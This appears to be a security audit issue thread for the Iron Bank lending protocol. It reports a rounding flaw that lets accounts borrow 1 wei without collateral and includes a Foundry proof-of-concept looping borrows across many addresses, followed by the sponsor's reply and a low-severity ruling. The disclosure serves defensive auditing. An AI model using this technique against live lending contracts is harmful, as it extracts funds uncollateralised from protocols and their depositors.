### ISSUE TITLE
n1punp - Attacker can borrow non-zero token amount without providing any collateral

### ISSUE THREAD

**Issue by sherlock-admin** [sherlock-audit/2023-05-ironbank-judging#20]
n1punp

high

# Attacker can borrow non-zero token amount without providing any collateral

## Summary
Attacker can borrow non-zero token amount without providing any collateral

## Vulnerability Detail
- `_getAccountLiquidity` rounds debt value down, so the debt value is actually lower than what it should be, leading to a possible borrowing without any collateralization.
- To be more precise, take DAI for example. When oracle reports price < 1e18 (less than $1), then borrowing 1 wei of the token will round the debt value down to 0, allowing the attacker to borrow nonzero amount without actually providing any collateral. This can be repeated as much as one desired.
- Here's the modified `TestBorrow.t.sol` test case:
```solidity
contract BorrowTest is ... {
  ...
  int256 internal constant market2Price = 0.9e8;
  ...

   function testBorrowFree() public {
        uint256 market1SupplyAmount = 100e18;
        uint256 market2BorrowAmount = 500e18;

        vm.startPrank(user2);
        market2.approve(address(ib), market2BorrowAmount);
        ib.supply(user2, user2, address(market2), market2BorrowAmount);
        vm.stopPrank();

        // test borrow from multiple accounts
        for(uint160 i = 1; i < 1000; i++) {
            address addr = address(i);
            vm.prank(addr);
            ib.borrow(addr, addr, address(market2), 1);
        }

        /**
         * collateral value = 0
         * borrowed value = 0 (even though borrowed sth)
         */
        (uint256 collateralValue, uint256 debtValue) = ib.getAccountLiquidity(user1);
        assertEq(collateralValue, 0);
        assertEq(debtValue, 0);
    }

```

This is the result:
```bash
Running 1 test for test/TestBorrow.t.sol:BorrowTest
[PASS] testBorrowFree() (gas: 162751618)
```

## Impact
- Attacker can borrow tokens without providing any collateral, creating an undesirable state.

## Code Snippet
https://github.com/sherlock-audit/2023-05-ironbank/blob/main/ib-v2/src/protocol/pool/IronBank.sol#L1054

## Tool used

Manual Review

## Recommendation
- Round `debtValue` calculation up in favor of the protocol.

**Comment by n1punp** [comment]
escalate for 10 usdc.

This issue breaks the core concept of lending protocol -- allowing borrowing without any prior collateralization (of 0 value). Even though the amount may be negligible, it's still possible to do so. 

Even if this may not seem profitable for the attacker, the attacker can still pay gas fees to (repeatedly) borrow out funds for free --> creating a hole in the protocol.

**Comment by ib-tycho** [comment]
We acknowledge the rounding issue but have decided not to fix it. As you mentioned, it is not profitable and not gas efficient. Implementing the recommendation to round up could introduce other issues, such as potential liquidation of borrowers due to the rounding up. It would require 10^6 of accounts to accumulate a 1 USDT deficit.

We maintain our position that this issue is excluded.

**Comment by hrishibhat** [comment]
Result:
Low
Unique
Based on the issue description and Sponsor comment the impact of the issue is not significant to be considered a valid medium
